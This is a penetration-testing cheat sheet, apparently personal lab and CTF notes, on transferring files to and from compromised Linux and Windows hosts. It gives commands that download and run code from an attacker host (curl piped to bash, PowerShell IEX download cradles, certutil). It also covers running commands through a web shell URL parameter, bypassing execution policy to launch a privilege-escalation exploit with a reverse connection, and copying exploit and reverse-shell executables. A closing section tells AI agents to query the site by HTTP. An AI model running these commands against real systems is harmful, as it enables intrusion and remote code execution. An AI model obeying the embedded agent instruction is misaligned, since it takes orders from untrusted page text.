# Transfer Files

## More

* <https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/>
* <https://gist.github.com/willurd/5720255>

## Curl

```
vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/
```

## smbserver

* Share from Linux SMB to Windows

```
locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run
```

## Windows Share

* Linux: Copy to Windows Share

```
smbclient //10.x.x.x/sharename -U domain/username
```

* Linux: Mount Windows Share

```
mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
```

* Windows: Copy to Windows Share

```
copy exploit.exe \\10.x.x.x\users\bob
```

## HTTP Server One Liners

```
> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
```

## Powershell

* [PowershellCheatsheet](/07-win-privesc/powershell.md)
* Share with Linux: python3 - m http.server
* Download with Window Powershell

```
----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IES(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile
```

## Powershell Advanced

* Can't execute the payload?
* Powershell ByPass Execution Policy
* Example: [ChimichurriWindowsPrivEsc](/07-win-privesc/win-privesc.md#chimichurri)

```
cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!
```

## smb setup issues

* Run smbserver.py from Linux
* Now Windows can share back to Linux
* [https://blog.ropnop.com/transferring-files-from-kali-to-windows/](https://blog.ropnop.com/transferring-files-from-kali-to-windows/#setting-up-the-server)
* <https://github.com/SecureAuthCorp/impacket>
* REF: [ChurrascoWindowsPrivEsc](/07-win-privesc/win-privesc.md#token-kidnapping-churrasco)

```
------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket
```

## smb setup impacket python2

```
Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket
```

## smb optional

* Example: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)

```
> impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
```

## nc

```
Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz
```

## updog

* Looks like an interesting option if you need SSL
* <https://github.com/sc0tfree/updog>
* Default port 9090

```
updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

```

## ftp

* anonymous, writable, port 2121
* <https://pythonhosted.org/pyftpdlib/faqs.html>

```
linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional
```

## Permission Trouble

* You may have a permissions problem
* Save and execute from the Temp folder!

```
cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe
```

## certutil

* You can download files on Windows with this tool
* REF: bountyHTB

```
rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/06-linux-privesc/04-transfer-files.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.